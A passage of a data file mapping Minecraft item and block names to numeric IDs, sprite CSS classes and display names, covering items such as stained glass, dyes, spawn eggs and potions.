{'1': {'class': 'at2 at_15', 'name': 'Mossy Cobblestone Wall'}, '0': {'class': 'at2 at_14', 'name': 'Cobblestone Wall'}, 'ID': '139:1'}, 'coal_block': {'0': {'class': 'at2 at_97', 'name': 'Block of Coal'}, 'ID': '173'}, 'golden_sword': {'0': {'class': 'at3 at_48', 'name': 'Gold Sword'}, 'ID': '283'}, 'sandstone': {'1': {'class': 'at0 at_47', 'name': 'Sandstone (Chiseled)'}, '0': {'class': 'at0 at_46', 'name': 'Sandstone'}, 'ID': '24:2', '2': {'class': 'at0 at_48', 'name': 'Sandstone (Smooth)'}}, 'diamond_shovel': {'0': {'class': 'at3 at_42', 'name': 'Diamond Shovel'}, 'ID': '277'}, 'iron_sword': {'0': {'class': 'at3 at_32', 'name': 'Iron Sword'}, 'ID': '267'}, 'record_stal': {'0': {'class': 'at5 at5_93', 'name': 'Music Disk (Stal)'}, 'ID': '2263'}, 'stained_glass': {'2': {'class': 'at1 at_51', 'name': 'Stained Glass (Magenta)'}, '0': {'class': 'at1 at_49', 'name': 'Stained Glass (White)'}, '14': {'class': 'at1 at_63', 'name': 'Stained Glass (Red)'}, '10': {'class': 'at1 at_59', 'name': 'Stained Glass (Purple)'}, 'ID': '95:15', '12': {'class': 'at1 at_61', 'name': 'Stained Glass (Brown)'}, '6': {'class': 'at1 at_55', 'name': 'Stained Glass (Pink)'}, '11': {'class': 'at1 at_60', 'name': 'Stained Glass (Blue)'}, '7': {'class': 'at1 at_56', 'name': 'Stained Glass (Gray)'}, '5': {'class': 'at1 at_54', 'name': 'Stained Glass (Lime)'}, '13': {'class': 'at1 at_62', 'name': 'Stained Glass (Green)'}, '3': {'class': 'at1 at_52', 'name': 'Stained Glass (Light Blue)'}, '8': {'class': 'at1 at_57', 'name': 'Stained Glass (Light Grey)'}, '4': {'class': 'at1 at_53', 'name': 'Stained Glass (Yellow)'}, '15': {'class': 'at1 at_64', 'name': 'Stained Glass (Black)'}, '1': {'class': 'at1 at_50', 'name': 'Stained Glass (Orange)'}, '9': {'class': 'at1 at_58', 'name': 'Stained Glass (Cyan)'}}, 'beef': {'0': {'class': 'at4 at_47', 'name': 'Raw Beef'}, 'ID': '363'}, 'noteblock': {'0': {'class': 'at0 at_49', 'name': 'Note Block'}, 'ID': '25'}, 'rail': {'0': {'class': 'at1 at_21', 'name': 'Rail'}, 'ID': '66'}, 'fire_charge': {'0': {'class': 'at5 at5_21', 'name': 'Fire Charge'}, 'ID': '385'}, 'oak_stairs': {'0': {'class': 'at1 at_9', 'name': 'Wooden Stairs (Oak)'}, 'ID': '53'}, 'jukebox': {'0': {'class': 'at1 at_38', 'name': 'Jukebox'}, 'ID': '84'}, 'gravel': {'0': {'class': 'at0 at_26', 'name': 'Gravel'}, 'ID': '13'}, 'fish': {'1': {'class': 'at4 at_15', 'name': 'Raw Salmon'}, '0': {'class': 'at4 at_14', 'name': 'Raw Fish'}, 'ID': '349:3', '3': {'class': 'at4 at_17', 'name': 'Pufferfish'}, '2': {'class': 'at4 at_16', 'name': 'Clownfish'}}, 'saddle': {'0': {'class': 'at3 at_94', 'name': 'Saddle'}, 'ID': '329'}, 'soul_sand': {'0': {'class': 'at1 at_42', 'name': 'Soul Sand'}, 'ID': '88'}, 'command_block': {'0': {'class': 'at2 at_12', 'name': 'Command Block'}, 'ID': '137'}, 'mycelium': {'0': {'class': 'at1 at_79', 'name': 'Mycelium'}, 'ID': '110'}, 'golden_horse_armor': {'0': {'class': 'at5 at5_58', 'name': 'Gold Horse Armor'}, 'ID': '418'}, 'double_plant': {'5': {'class': 'at3 at_4', 'name': 'Peony'}, '2': {'class': 'at3 at_1', 'name': 'Double Tallgrass'}, '0': {'class': 'at2 at_99', 'name': 'Sunflower'}, '3': {'class': 'at3 at_2', 'name': 'Large Fern'}, '4': {'class': 'at3 at_3', 'name': 'Rose Bush'}, '1': {'class': 'at3', 'name': 'Lilac'}, 'ID': '175:5'}, 'sign': {'0': {'class': 'at3 at_88', 'name': 'Sign'}, 'ID': '323'}, 'stone_pressure_plate': {'0': {'class': 'at1 at_24', 'name': 'Stone Pressure Plate'}, 'ID': '70'}, 'record_strad': {'0': {'class': 'at5 at5_94', 'name': 'Music Disk (Strad)'}, 'ID': '2264'}, 'cocoa': {'0': {'class': 'at2 at_2', 'name': 'Cocoa Plant'}, 'ID': '127'}, 'log2': {'1': {'class': 'at2 at_69', 'name': 'Wood (Dark Oak)'}, '0': {'class': 'at2 at_68', 'name': 'Wood (Acacia Oak)'}, 'ID': '162:1'}, 'nether_star': {'0': {'class': 'at5 at5_39', 'name': 'Nether Star'}, 'ID': '399'}, 'glowstone': {'0': {'class': 'at1 at_43', 'name': 'Glowstone'}, 'ID': '89'}, 'gunpowder': {'0': {'class': 'at3 at_54', 'name': 'Gunpowder'}, 'ID': '289'}, 'wooden_axe': {'0': {'class': 'at3 at_36', 'name': 'Wooden Axe'}, 'ID': '271'}, 'fence_gate': {'0': {'class': 'at1 at_76', 'name': 'Fence Gate (Oak)'}, 'ID': '107'}, 'tallgrass': {'1': {'class': 'at0 at_55', 'name': 'Tall Grass'}, '0': {'class': 'at0 at_57', 'name': 'Tall Grass (Dead Shrub)'}, 'ID': '31:2', '2': {'class': 'at0 at_56', 'name': 'Tall Grass (Fern)'}}, 'brick': {'0': {'class': 'at4 at_1', 'name': 'Clay Brick'}, 'ID': '336'}, 'slime': {'0': {'class': 'at2 at_72', 'name': 'Slime Block'}, 'ID': '165'}, 'clock': {'0': {'class': 'at4 at_12', 'name': 'Watch'}, 'ID': '347'}, 'bedrock': {'0': {'class': 'at0 at_20', 'name': 'Bedrock'}, 'ID': '7'}, 'poisonous_potato': {'0': {'class': 'at5 at5_30', 'name': 'Poisonous Potato'}, 'ID': '394'}, 'pumpkin': {'0': {'class': 'at1 at_40', 'name': 'Pumpkin'}, 'ID': '86'}, 'mossy_cobblestone': {'0': {'class': 'at1 at_4', 'name': 'Moss Stone'}, 'ID': '48'}, 'ender_chest': {'0': {'class': 'at2 at_5', 'name': 'Ender Chest'}, 'ID': '130'}, 'stone_shovel': {'0': {'class': 'at3 at_38', 'name': 'Stone Shovel'}, 'ID': '273'}, 'sticky_piston': {'0': {'class': 'at0 at_53', 'name': 'Sticky Piston'}, 'ID': '29'}, 'farmland': {'0': {'class': 'at1 at_16', 'name': 'Farmland'}, 'ID': '60'}, 'mutton': {'0': {'class': 'at5 at5_63', 'name': 'Raw Mutton'}, 'ID': '423'}, 'golden_rail': {'0': {'class': 'at0 at_51', 'name': 'Rail (Powered)'}, 'ID': '27'}, 'furnace_minecart': {'0': {'class': 'at4 at_8', 'name': 'Minecart (Powered)'}, 'ID': '343'}, 'snow': {'0': {'class': 'at1 at_34', 'name': 'Snow Block'}, 'ID': '80'}, 'acacia_fence_gate': {'0': {'class': 'at3 at_14', 'name': 'Fence Gate (Acacia)'}, 'ID': '187'}, 'spruce_fence_gate': {'0': {'class': 'at3 at_10', 'name': 'Fence Gate (Spruce)'}, 'ID': '183'}, 'powered_repeater': {'0': {'class': 'at1 at_48', 'name': 'Redstone Repeater (Block On)'}, 'ID': '94'}, 'fire': {'0': {'class': 'at1 at_7', 'name': 'Fire'}, 'ID': '51'}, 'chainmail_boots': {'0': {'class': 'at3 at_70', 'name': 'Chainmail Boots'}, 'ID': '305'}, 'rotten_flesh': {'0': {'class': 'at4 at_51', 'name': 'Rotten Flesh'}, 'ID': '367'}, 'redstone_wire': {'0': {'class': 'at1 at_11', 'name': 'Redstone Wire'}, 'ID': '55'}, 'lever': {'0': {'class': 'at1 at_23', 'name': 'Lever'}, 'ID': '69'}, 'hopper': {'0': {'class': 'at2 at_27', 'name': 'Hopper'}, 'ID': '154'}, 'milk_bucket': {'0': {'class': 'at4', 'name': 'Bucket (Milk)'}, 'ID': '335'}, 'standing_sign': {'0': {'class': 'at3 at_88', 'name': 'Sign (Block)'}, 'ID': '63'}, 'prismarine': {'1': {'class': 'at2 at_76', 'name': 'Prismarine Bricks'}, '0': {'class': 'at2 at_75', 'name': 'Prismarine'}, 'ID': '168:2', '2': {'class': 'at2 at_77', 'name': 'Dark Prismarine'}}, 'nether_brick': {'0': {'class': 'at1 at_81', 'name': 'Nether Brick'}, 'ID': '112'}, 'rabbit_stew': {'0': {'class': 'at5 at5_53', 'name': 'Rabbit Stew'}, 'ID': '413'}, 'diamond': {'0': {'class': 'at3 at_29', 'name': 'Diamond Gem'}, 'ID': '264'}, 'stone_slab2': {'0': {'class': 'at3 at_9', 'name': 'Red Sandstone Slab'}, 'ID': '182'}, 'stone': {'5': {'class': 'at0 at_5', 'name': 'Andesite'}, '2': {'class': 'at0 at_2', 'name': 'Polished Granite'}, '0': {'class': 'at0', 'name': 'Stone'}, '3': {'class': 'at0 at_3', 'name': 'Diorite'}, '4': {'class': 'at0 at_4', 'name': 'Polished Diorite'}, '1': {'class': 'at0 at_1', 'name': 'Granite'}, 'ID': '1:6', '6': {'class': 'at0 at_6', 'name': 'Polished Andesite'}}, 'sugar': {'0': {'class': 'at4 at_37', 'name': 'Sugar'}, 'ID': '353'}, 'cooked_beef': {'0': {'class': 'at4 at_48', 'name': 'Steak'}, 'ID': '364'}, 'egg': {'0': {'class': 'at4 at_9', 'name': 'Egg'}, 'ID': '344'}, 'acacia_fence': {'0': {'class': 'at3 at_19', 'name': 'Fence (Acacia)'}, 'ID': '192'}, 'potato': {'0': {'class': 'at5 at5_28', 'name': 'Potato'}, 'ID': '392'}, 'record_13': {'0': {'class': 'at5 at5_86', 'name': 'Music Disk (13)'}, 'ID': '2256'}, 'dye': {'2': {'class': 'at4 at_22', 'name': 'Cactus Green Dye'}, '0': {'class': 'at4 at_20', 'name': 'Ink Sack'}, '14': {'class': 'at4 at_34', 'name': 'Orange Dye'}, '10': {'class': 'at4 at_30', 'name': 'Lime Dye'}, 'ID': '351:15', '12': {'class': 'at4 at_32', 'name': 'Light Blue Dye'}, '6': {'class': 'at4 at_26', 'name': 'Cyan Dye'}, '11': {'class': 'at4 at_31', 'name': 'Dandelion Yellow Dye'}, '7': {'class': 'at4 at_27', 'name': 'Light Gray Dye'}, '5': {'class': 'at4 at_25', 'name': 'Purple Dye'}, '13': {'class': 'at4 at_33', 'name': 'Magenta Dye'}, '3': {'class': 'at4 at_23', 'name': 'Cocoa Bean'}, '8': {'class': 'at4 at_28', 'name': 'Gray Dye'}, '4': {'class': 'at4 at_24', 'name': 'Lapis Lazuli'}, '15': {'class': 'at4 at_35', 'name': 'Bone Meal'}, '1': {'class': 'at4 at_21', 'name': 'Rose Red Dye'}, '9': {'class': 'at4 at_29', 'name': 'Pink Dye'}}, 'birch_door': {'0': {'class': 'at5 at5_82', 'name': 'Wooden Door (Birch)'}, 'ID': '428'}, 'iron_trapdoor': {'0': {'class': 'at2 at_74', 'name': 'Iron Trapdoor'}, 'ID': '167'}, 'blaze_rod': {'0': {'class': 'at4 at_53', 'name': 'Blaze Rod'}, 'ID': '369'}, 'skull': {'2': {'class': 'at5 at5_35', 'name': 'Head (Zombie)'}, '0': {'class': 'at5 at5_33', 'name': 'Head (Skeleton)'}, '3': {'class': 'at5 at5_36', 'name': 'Head (Steve)'}, '4': {'class': 'at5 at5_37', 'name': 'Head (Creeper)'}, '1': {'class': 'at5 at5_34', 'name': 'Head (Wither)'}, 'ID': '397:4'}, 'cooked_mutton': {'0': {'class': 'at5 at5_64', 'name': 'Cooked Mutton'}, 'ID': '424'}, 'chainmail_chestplate': {'0': {'class': 'at3 at_68', 'name': 'Chainmail Chestplate'}, 'ID': '303'}, 'sand': {'1': {'class': 'at0 at_25', 'name': 'Red Sand'}, '0': {'class': 'at0 at_24', 'name': 'Sand'}, 'ID': '12:1'}, 'fence': {'0': {'class': 'at1 at_39', 'name': 'Fence (Oak)'}, 'ID': '85'}, 'wooden_hoe': {'0': {'class': 'at3 at_55', 'name': 'Wooden Hoe'}, 'ID': '290'}, 'golden_chestplate': {'0': {'class': 'at3 at_80', 'name': 'Gold Chestplate'}, 'ID': '315'}, 'daylight_detector_inverted': {'0': {'class': '', 'name': 'Inverted Daylight Sensor'}, 'ID': '178'}, 'cooked_rabbit': {'0': {'class': 'at5 at5_52', 'name': 'Cooked Rabbit'}, 'ID': '412'}, 'leather_leggings': {'0': {'class': 'at3 at_65', 'name': 'Leather Leggings'}, 'ID': '300'}, 'rabbit_hide': {'0': {'class': 'at5 at5_55', 'name': 'Rabbit Hide'}, 'ID': '415'}, 'double_wooden_slab': {'5': {'class': 'at1 at_95', 'name': 'Dark Oak Wood Slab (Double)'}, '2': {'class': 'at0 at_12', 'name': 'Birch-Wood Slab (Double)'}, '0': {'class': 'at0 at_11', 'name': 'Oak-Wood Slab (Double)'}, '3': {'class': 'at0 at_13', 'name': 'Jungle-Wood Slab (Double)'}, '4': {'class': 'at1 at_94', 'name': 'Acacia Wood Slab (Double)'}, '1': {'class': 'at0 at_22', 'name': 'Spruce-Wood Slab (Double)'}, 'ID': '125:5'}, 'stone_brick_stairs': {'0': {'class': 'at1 at_78', 'name': 'Stone Brick Stairs'}, 'ID': '109'}, 'dark_oak_fence': {'0': {'class': 'at3 at_18', 'name': 'Fence (Dark Oak)'}, 'ID': '191'}, 'jungle_fence_gate': {'0': {'class': 'at3 at_12', 'name': 'Fence Gate (Jungle)'}, 'ID': '185'}, 'gold_ingot': {'0': {'class': 'at3 at_31', 'name': 'Gold Ingot'}, 'ID': '266'}, 'fireworks': {'0': {'class': 'at5 at5_41', 'name': 'Firework Rocket'}, 'ID': '401'}, 'bucket': {'0': {'class': 'at3 at_90', 'name': 'Bucket'}, 'ID': '325'}, 'wheat_seeds': {'0': {'class': 'at3 at_60', 'name': 'Wheat Seeds'}, 'ID': '295'}, 'iron_door': {'0': {'class': 'at3 at_95', 'name': 'Iron Door'}, 'ID': '330'}, 'deadbush': {'0': {'class': 'at0 at_57', 'name': 'Dead Shrub'}, 'ID': '32'}, 'pumpkin_pie': {'0': {'class': 'at5 at5_40', 'name': 'Pumpkin Pie'}, 'ID': '400'}, 'record_mellohi': {'0': {'class': 'at5 at5_92', 'name': 'Music Disk (Mellohi)'}, 'ID': '2262'}, 'wooden_pressure_plate': {'0': {'class': 'at1 at_26', 'name': 'Wooden Pressure Plate'}, 'ID': '72'}, 'emerald_ore': {'0': {'class': 'at2 at_4', 'name': 'Emerald Ore'}, 'ID': '129'}, 'stone_button': {'0': {'class': 'at1 at_31', 'name': 'Button (Stone)'}, 'ID': '77'}, 'quartz_ore': {'0': {'class': 'at2 at_26', 'name': 'Nether Quartz Ore'}, 'ID': '153'}, 'emerald': {'0': {'class': 'at5 at5_24', 'name': 'Emerald'}, 'ID': '388'}, 'golden_leggings': {'0': {'class': 'at3 at_81', 'name': 'Gold Leggings'}, 'ID': '316'}, 'written_book': {'0': {'class': 'at5 at5_23', 'name': 'Written Book'}, 'ID': '387'}, 'gold_nugget': {'0': {'class': 'at4 at_55', 'name': 'Gold Nugget'}, 'ID': '371'}, 'anvil': {'1': {'class': 'at2 at_20', 'name': 'Anvil (Slightly Damaged)'}, '0': {'class': 'at2 at_20', 'name': 'Anvil'}, 'ID': '145:2', '2': {'class': 'at2 at_20', 'name': 'Anvil (Very Damaged)'}}, 'trapdoor': {'0': {'class': 'at1 at_65', 'name': 'Trapdoor'}, 'ID': '96'}, 'iron_leggings': {'0': {'class': 'at3 at_73', 'name': 'Iron Leggings'}, 'ID': '308'}, 'diamond_pickaxe': {'0': {'class': 'at3 at_43', 'name': 'Diamond Pickaxe'}, 'ID': '278'}, 'fishing_rod': {'0': {'class': 'at4 at_11', 'name': 'Fishing Rod'}, 'ID': '346'}, 'diamond_hoe': {'0': {'class': 'at3 at_58', 'name': 'Diamond Hoe'}, 'ID': '293'}, 'hopper_minecart': {'0': {'class': 'at5 at5_48', 'name': 'Minecart (Hopper)'}, 'ID': '408'}, 'diamond_horse_armor': {'0': {'class': 'at5 at5_59', 'name': 'Diamond Horse Armor'}, 'ID': '419'}, 'carrots': {'0': {'class': 'at2 at_17', 'name': 'Carrot (Crop)'}, 'ID': '141'}, 'cooked_fished': {'1': {'class': 'at4 at_19', 'name': 'Cooked Salmon'}, '0': {'class': 'at4 at_18', 'name': 'Cooked Fish'}, 'ID': '350:3', '3': {'class': 'at4 at_17', 'name': 'Pufferfish'}, '2': {'class': 'at4 at_16', 'name': 'Clownfish'}}, 'carrot_on_a_stick': {'0': {'class': 'at5 at5_38', 'name': 'Carrot on a Stick'}, 'ID': '398'}, 'red_sandstone_stairs': {'0': {'class': 'at3 at_8', 'name': 'Red Sandstone Stairs'}, 'ID': '180'}, 'name_tag': {'0': {'class': 'at5 at5_61', 'name': 'Name Tag'}, 'ID': '421'}, 'spawn_egg': {'50': {'class': 'at4 at_93', 'name': 'Spawn Egg (Creeper)'}, '68': {'class': 'at5 at5_8', 'name': 'Spawn Egg (Guardian)'}, '101': {'class': 'at5 at5_18', 'name': 'Spawn Egg (Rabbit)'}, '55': {'class': 'at4 at_97', 'name': 'Spawn Egg (Slime)'}, '100': {'class': 'at5 at5_17', 'name': 'Spawn Egg (Horse)'}, '51': {'class': 'at4 at_94', 'name': 'Spawn Egg (Skeleton)'}, '54': {'class': 'at4 at_96', 'name': 'Spawn Egg (Zombie)'}, '96': {'class': 'at5 at5_15', 'name': 'Spawn Egg (Mooshroom)'}, '62': {'class': 'at5 at5_4', 'name': 'Spawn Egg (Magma Cube)'}, '65': {'class': 'at5 at5_5', 'name': 'Spawn Egg (Bat)'}, '57': {'class': 'at4 at_99', 'name': 'Spawn Egg (Zombie Pigmen)'}, '61': {'class': 'at5 at5_3', 'name': 'Spawn Egg (Blaze)'}, '94': {'class': 'at5 at5_13', 'name': 'Spawn Egg (Squid)'}, '93': {'class': 'at5 at5_12', 'name': 'Spawn Egg (Chicken)'}, '92': {'class': 'at5 at5_11', 'name': 'Spawn Egg (Cow)'}, '90': {'class': 'at5 at5_9', 'name': 'Spawn Egg (Pig)'}, '52': {'class': 'at4 at_95', 'name': 'Spawn Egg (Spider)'}, 'ID': '383:120', '120': {'class': 'at5 at5_19', 'name': 'Spawn Egg (Villager)'}, '60': {'class': 'at5 at5_2', 'name': 'Spawn Egg (Silverfish)'}, '59': {'class': 'at5 at5_1', 'name': 'Spawn Egg (Cave Spider)'}, '95': {'class': 'at5 at5_14', 'name': 'Spawn Egg (Wolf)'}, '66': {'class': 'at5 at5_6', 'name': 'Spawn Egg (Witch)'}, '67': {'class': 'at5 at5_7', 'name': 'Spawn Egg (Endermite)'}, '58': {'class': 'at5', 'name': 'Spawn Egg (Endermen)'}, '56': {'class': 'at4 at_98', 'name': 'Spawn Egg (Ghast)'}, '98': {'class': 'at5 at5_16', 'name': 'Spawn Egg (Ocelot)'}, '91': {'class': 'at5 at5_10', 'name': 'Spawn Egg (Sheep)'}}, 'iron_block': {'0': {'class': 'at0 at_89', 'name': 'Block of Iron'}, 'ID': '42'}, 'lava_bucket': {'0': {'class': 'at3 at_92', 'name': 'Bucket (Lava)'}, 'ID': '327'}, 'unlit_redstone_torch': {'0': {'class': 'at1 at_29', 'name': 'Redstone Torch (Off)'}, 'ID': '75'}, 'unpowered_comparator': {'0': {'class': 'at5 at5_44', 'name': 'Redstone Comparator (Off)'}, 'ID': '149'}, 'leather': {'0': {'class': 'at3 at_99', 'name': 'Leather'}, 'ID': '334'}, 'glass_pane': {'0': {'class': 'at1 at_72', 'name': 'Glass Pane'}, 'ID': '102'}, 'water': {'0': {'class': 'at0 at_21', 'name': 'Water (No Spread)'}, 'ID': '9'}, 'iron_horse_armor': {'0': {'class': 'at5 at5_57', 'name': 'Iron Horse Armor'}, 'ID': '417'}, 'golden_apple': {'1': {'class': 'at3 at_87', 'name': 'Enchanted Golden Apple'}, '0': {'class': 'at3 at_87', 'name': 'Golden Apple'}, 'ID': '322:1'}, 'stick': {'0': {'class': 'at3 at_45', 'name': 'Stick'}, 'ID': '280'}, 'iron_boots': {'0': {'class': 'at3 at_74', 'name': 'Iron Boots'}, 'ID': '309'}, 'leaves2': {'1': {'class': 'at2 at_67', 'name': 'Leaves (Dark Oak)'}, '0': {'class': 'at2 at_66', 'name': 'Leaves (Acacia)'}, 'ID': '161:1'}, 'sea_lantern': {'0': {'class': 'at2 at_78', 'name': 'Sea Lantern'}, 'ID': '169'}, 'prismarine_shard': {'0': {'class': 'at5 at5_49', 'name': 'Prismarine Shard'}, 'ID': '409'}, 'wall_sign': {'0': {'class': 'at3 at_88', 'name': 'Sign (Wall Block)'}, 'ID': '68'}, 'tnt': {'0': {'class': 'at1 at_2', 'name': 'TNT'}, 'ID': '46'}, 'jungle_door': {'0': {'class': 'at5 at5_83', 'name': 'Wooden Door (Jungle)'}, 'ID': '429'}, 'paper': {'0': {'class': 'at4 at_4', 'name': 'Paper'}, 'ID': '339'}, 'vine': {'0': {'class': 'at1 at_75', 'name': 'Vines'}, 'ID': '106'}, 'daylight_detector': {'0': {'class': 'at2 at_24', 'name': 'Daylight Sensor'}, 'ID': '151'}, 'lava': {'0': {'class': 'at0 at_23', 'name': 'Lava (No Spread)'}, 'ID': '11'}, 'experience_bottle': {'0': {'class': 'at5 at5_20', 'name': 'Bottle of Enchanting'}, 'ID': '384'}, 'iron_ingot': {'0': {'class': 'at3 at_30', 'name': 'Iron Ingot'}, 'ID': '265'}, 'enchanted_book': {'0': {'class': 'at5 at5_43', 'name': 'Enchanted Book'}, 'ID': '403'}, 'stone_sword': {'0': {'class': 'at3 at_37', 'name': 'Stone Sword'}, 'ID': '272'}, 'flowing_lava': {'0': {'class': 'at0 at_23', 'name': 'Lava'}, 'ID': '10'}, 'red_flower': {'7': {'class': 'at0 at_84', 'name': 'Pink Tulip'}, '5': {'class': 'at0 at_82', 'name': 'Orange Tulip'}, '2': {'class': 'at0 at_79', 'name': 'Allium'}, '0': {'class': 'at0 at_77', 'name': 'Poppy'}, '3': {'class': 'at0 at_80', 'name': 'Azure Bluet'}, '8': {'class': 'at0 at_85', 'name': 'Oxeye Daisy'}, '4': {'class': 'at0 at_81', 'name': 'Red Tulip'}, '1': {'class': 'at0 at_78', 'name': 'Blue Orchid'}, 'ID': '38:8', '6': {'class': 'at0 at_83', 'name': 'White Tulip'}}, 'pumpkin_stem': {'0': {'class': 'at1 at_74', 'name': 'Pumpkin Vine'}, 'ID': '104'}, 'crafting_table': {'0': {'class': 'at1 at_14', 'name': 'Workbench'}, 'ID': '58'}, 'coal_ore': {'0': {'class': 'at0 at_29', 'name': 'Coal Ore'}, 'ID': '16'}, 'iron_pickaxe': {'0': {'class': 'at3 at_21', 'name': 'Iron Pickaxe'}, 'ID': '257'}, 'bowl': {'0': {'class': 'at3 at_46', 'name': 'Bowl'}, 'ID': '281'}, 'record_far': {'0': {'class': 'at5 at5_90', 'name': 'Music Disk (Far)'}, 'ID': '2260'}, 'brick_stairs': {'0': {'class': 'at1 at_77', 'name': 'Brick Stairs'}, 'ID': '108'}, 'iron_bars': {'0': {'class': 'at1 at_71', 'name': 'Iron Bars'}, 'ID': '101'}, 'clay_ball': {'0': {'class': 'at4 at_2', 'name': 'Clay'}, 'ID': '337'}, 'bow': {'0': {'class': 'at3 at_25', 'name': 'Bow'}, 'ID': '261'}, 'chest': {'0': {'class': 'at1 at_10', 'name': 'Chest'}, 'ID': '54'}, 'melon': {'0': {'class': 'at4 at_44', 'name': 'Melon (Slice)'}, 'ID': '360'}, 'acacia_door': {'0': {'class': 'at5 at5_84', 'name': 'Wooden Door (Acacia)'}, 'ID': '430'}, 'wooden_door': {'0': {'class': 'at3 at_89', 'name': 'Wooden Door'}, 'ID': '324'}, 'dark_oak_stairs': {'0': {'class': 'at2 at_71', 'name': 'Wooden Stairs (Dark Oak)'}, 'ID': '164'}, 'flint_and_steel': {'0': {'class': 'at3 at_23', 'name': 'Flint and Steel'}, 'ID': '259'}, 'dark_oak_door': {'0': {'class': 'at5 at5_85', 'name': 'Wooden Door (Dark Oak)'}, 'ID': '431'}, 'map': {'0': {'class': 'at5 at5_31', 'name': 'Empty Map'}, 'ID': '395'}, 'glass': {'0': {'class': 'at0 at_42', 'name': 'Glass'}, 'ID': '20'}, 'bread': {'0': {'class': 'at3 at_62', 'name': 'Bread'}, 'ID': '297'}, 'compass': {'0': {'class': 'at4 at_10', 'name': 'Compass'}, 'ID': '345'}, 'quartz': {'0': {'class': 'at5 at5_46', 'name': 'Nether Quartz'}, 'ID': '406'}, 'leather_chestplate': {'0': {'class': 'at3 at_64', 'name': 'Leather Chestplate'}, 'ID': '299'}, 'diamond_chestplate': {'0': {'class': 'at3 at_76', 'name': 'Diamond Chestplate'}, 'ID': '311'}, 'record_11': {'0': {'class': 'at5 at5_96', 'name': 'Music Disk (11)'}, 'ID': '2266'}, 'end_stone': {'0': {'class': 'at1 at_90', 'name': 'End Stone'}, 'ID': '121'}, 'piston_head': {'0': {'class': 'at0 at_59', 'name': 'Piston (Head)'}, 'ID': '34'}, 'potion': {'16428': {'class': 'at4 at_80', 'name': 'Harming Splash II'}, '16387': {'class': 'at4 at_73', 'name': 'Fire Resistance Splash (2:15)'}, '16452': {'class': 'at4 at_74', 'name': 'Poison Splash (1:30)'}, '16420': {'class': 'at4 at_74', 'name': 'Poison Splash II (0:16)'}, '8198': {'class': 'at4 at_63', 'name': 'Night Vision Potion (3:00)'}, '8297': {'class': 'at4 at_65', 'name': 'Strength Potion II (4:00)'}, '8204': {'class': 'at4 at_67', 'name': 'Harming Potion'}, '8233': {'class': 'at4 at_65', 'name': 'Strength Potion II (1:30)'}, '16457': {'class': 'at4 at_78', 'name': 'Strength Splash (6:00)'}, '8260': {'class': 'at4 at_61', 'name': 'Poison Potion (2:00)'}, '16450': {'class': 'at4 at_72', 'name': 'Swiftness Splash (6:00)'}, '8267': {'class': 'at4 at_70', 'name': 'Leaping Potion (3:00)'}, '8236': {'class': 'at4 at_67', 'name': 'Harming Potion II'}, '16459': {'class': 'at4 at_83', 'name': 'Leaping Splash (2:15)'}, '8195': {'class': 'at4 at_60', 'name': 'Fire Resistance Potion (3:00)'}, '8258': {'class': 'at4 at_59', 'name': 'Swiftness Potion (8:00)'}, '16462': {'class': 'at4 at_82', 'name': 'Invisibility Splash (6:00)'}, '16393': {'class': 'at4 at_78', 'name': 'Strength Splash (2:15)'}, '16': {'class': 'at4 at_57', 'name': 'Awkward Potion'}, '8292': {'class': 'at4 at_61', 'name': 'Poison Potion II (1:00)'}, '16386': {'class': 'at4 at_72', 'name': 'Swiftness Splash (2:15)'}, '8201': {'class': 'at4 at_65', 'name': 'Strength Potion (3:00)'}, '16489': {'class': 'at4 at_78', 'name': 'Strength Splash II (3:00)'}, '16481': {'class': 'at4 at_71', 'name': 'Regeneration Splash II (0:45)'}, '8202': {'class': 'at4 at_66', 'name': 'Slowness Potion (1:30)'}, '16397': {'class': 'at4 at_81', 'name': 'Breathing Splash (2:15)'}, '16425': {'class': 'at4 at_78', 'name': 'Strength Splash II (1:07)'}, '16388': {'class': 'at4 at_74', 'name': 'Poison Splash (0:33)'}, '8259': {'class': 'at4 at_60', 'name': 'Fire Resistance Potion (8:00)'}, '8197': {'class': 'at4 at_62', 'name': 'Healing Potion'}, '16484': {'class': 'at4 at_74', 'name': 'Poison Splash II (0:45)'}, '16454': {'class': 'at4 at_76', 'name': 'Night Vision Splash (6:00)'}, '8205': {'class': 'at4 at_68', 'name': 'Water Breathing Potion (3:00)'}, '16394': {'class': 'at4 at_79', 'name': 'Slowness Splash (1:07)'}, '16482': {'class': 'at4 at_72', 'name': 'Swiftness Splash II (3:00)'}, '32': {'class': 'at4 at_57', 'name': 'Thick Potion'}, '16417': {'class': 'at4 at_71', 'name': 'Regeneration Splash II (0:16)'}, '16456': {'class': 'at4 at_77', 'name': 'Weakness Splash (3:00)'}, '8290': {'class': 'at4 at_59', 'name': 'Swiftness Potion II (4:00)'}, '8206': {'class': 'at4 at_69', 'name': 'Invisibility Potion (3:00)'}, '16385': {'class': 'at4 at_71', 'name': 'Regeneration Splash (0:33)'}, '8264': {'class': 'at4 at_64', 'name': 'Weakness Potion (4:00)'}, '8269': {'class': 'at4 at_68', 'name': 'Water Breathing Potion (8:00)'}, '8229': {'class': 'at4 at_62', 'name': 'Healing Potion II'}, '8262': {'class': 'at4 at_63', 'name': 'Night Vision Potion (8:00)'}, '16451': {'class': 'at4 at_73', 'name': 'Fire Resistance Splash (6:00)'}, '16427': {'class': 'at4 at_83', 'name': 'Leaping Splash II (1:07)'}, '8226': {'class': 'at4 at_59', 'name': 'Swiftness Potion II (1:30)'}, '8270': {'class': 'at4 at_69', 'name': 'Invisibility Potion (8:00)'}, '8194': {'class': 'at4 at_59', 'name': 'Swiftness Potion (3:00)'}, '8235': {'class': 'at4 at_70', 'name': 'Leaping Potion II (1:30)'}, '8289': {'class': 'at4 at_58', 'name': 'Regeneration Potion II (1:00)'}, '16458': {'class': 'at4 at_79', 'name': 'Slowness Splash (3:00)'}, '8265': {'class': 'at4 at_65', 'name': 'Strength Potion (8:00)'}, '16390': {'class': 'at4 at_76', 'name': 'Night Vision Splash (2:15)'}, '8266': {'class': 'at4 at_66', 'name': 'Slowness Potion (4:00)'}, '64': {'class': 'at4 at_57', 'name': 'Mundane Potion'}, '16398': {'class': 'at4 at_82', 'name': 'Invisibility Splash (2:15)'}, '16449': {'class': 'at4 at_71', 'name': 'Regeneration Splash (1:30)'}, '16421': {'class': 'at4 at_75', 'name': 'Healing Splash II'}, '0': {'class': 'at4 at_57', 'name': 'Water Bottle'}, '8193': {'class': 'at4 at_58', 'name': 'Regeneration Potion (0:45)'}, '16461': {'class': 'at4 at_81', 'name': 'Breathing Splash (6:00)'}, '8196': {'class': 'at4 at_61', 'name': 'Poison Potion (0:45)'}, '8257': {'class': 'at4 at_58', 'name': 